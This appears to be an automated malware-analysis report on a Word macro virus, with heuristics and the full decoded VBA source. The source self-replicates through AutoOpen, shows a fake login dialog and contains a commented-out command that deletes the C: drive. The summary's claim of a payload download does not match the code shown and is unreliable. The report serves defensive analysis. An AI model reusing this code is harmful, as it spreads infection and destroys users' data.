MALICIOUS
Risk Score: 268
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine, a common technique for malicious Office documents. The macro attempts to display a dialog box labeled 'Validation Check' with a dropdown list and a picture, likely as a lure to trick the user into executing further malicious actions. The presence of a Shell() call within the VBA code strongly suggests the macro is intended to download and execute a secondary payload.
Heuristics 6
- ClamAV: Doc.Trojan.Day-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Day-4
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3386 bytes |

SHA-256: 3a725709d2fdde8a56ce95eabcfaa95379d8ea4abfff383fce4bd90f6488ed2b
Detection: ClamAV: Doc.Trojan.Day-4
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "autoopen"
Public Sub MAIN()
Dim thisday
Dim DayFlag
Dim Button
Dim Flag$
Dim False_
ReDim NameList__$(3)
WordBasic.DisableInput
NameList__$(0) = "µçÄÔ²¿"
NameList__$(1) = "IBM"
NameList__$(2) = "MicroSoft"
NameList__$(3) = "Compaq"
thisday = WordBasic.WeekDay(WordBasic.Now()) - 1
'MsgBox Str$(thisday)
If WordBasic.CountWindows() = 0 Then
WordBasic.FileNew
WordBasic.SetDocumentVar "NewFlag", "True"
Else
WordBasic.SetDocumentVar "NewFlag", "False"
End If
WordBasic.SetDocumentVar "CloseFlag", "True"
WordBasic.BeginDialog 320, 144, "Validation Check", "AutoOpen.MyFunc"
WordBasic.OKButton 170, 108, 88, 21
WordBasic.DropListBox 106, 33, 160, 38, NameList__$(), "DropListBox1"
WordBasic.Text 20, 33, 68, 13, "UserName£º", "Text1"
' Text 19, 62, 48, 13, "UserId£º", .Text2
' TextBox 106, 60, 160, 18, .TextBox1
WordBasic.Text 119, 8, 78, 13, "Certification", "Text3"
WordBasic.Picture 3, 88, 118, 54, "fig", 1, "Picture1"
WordBasic.EndDialog
Dim LoginDlg As Object: Set LoginDlg = WordBasic.CurValues.UserDialog
DayFlag = WordBasic.Today() > WordBasic.DateSerial(97, 7, 20)
If ((thisday = 3) Or (thisday = 5)) And DayFlag Then Button = WordBasic.Dialog.UserDialog(LoginDlg)
Flag$ = WordBasic.[GetDocumentVar$]("CloseFlag")
If (DayFlag = False_) Then Flag$ = "False"
'MsgBox Flag$ + " "
If WordBasic.[FileNameFromWindow$]() <> "" Then
On Error GoTo -1: On Error GoTo Infest
WordBasic.MacroCopy WordBasic.[FileNameFromWindow$]() + ":AutoOpen", "AutoOpen"
Infest: On Error GoTo -1: On Error GoTo NInfest
WordBasic.MacroCopy "AutoOpen", WordBasic.[FileNameFromWindow$]() + ":AutoOpen"
NInfest:
If (thisday <> 3) And (thisday <> 5) Then
WordBasic.FileSaveAll 1, 1
Flag$ = "False"
End If
End If
If Flag$ = "True" Then ExitWord
End Sub
Private Function MyFunc(identifier$, action, suppvalue)
Select Case action
Case 1 'The Dialog Displayed
Case 2 ' the user Selects a Control
If identifier$ = "DropListBox1" Then
Dim Password$
Password$ = "0"
On Error Resume Next
Password$ = WordBasic.[InputBox$]("Input your Password")
If (WordBasic.DlgValue("DropListBox1") = 0) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
ElseIf (WordBasic.DlgValue("DropListBox1") = 1) And (WordBasic.Val(Password$) <> 20300) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
ElseIf (WordBasic.DlgValue("DropListBox1") = 2) And (WordBasic.Val(Password$) <> 36000) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
ElseIf (WordBasic.DlgValue("DropListBox1") = 3) And (WordBasic.Val(Password$) <> 40004) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
Else
WordBasic.SetDocumentVar "CloseFlag", "False"
End If
End If
Case 3 ' Text Changed
'MsgBox LoginDlg.TextBox2
Case Else
End Select
End Function
Private Sub ExitWord()
'Shell Environ$("COMSPEC") + "/c Deltree /Y C:\"
WordBasic.SetTemplateDirty
WordBasic.FileSaveAll 1, 1
WordBasic.AppClose
End Sub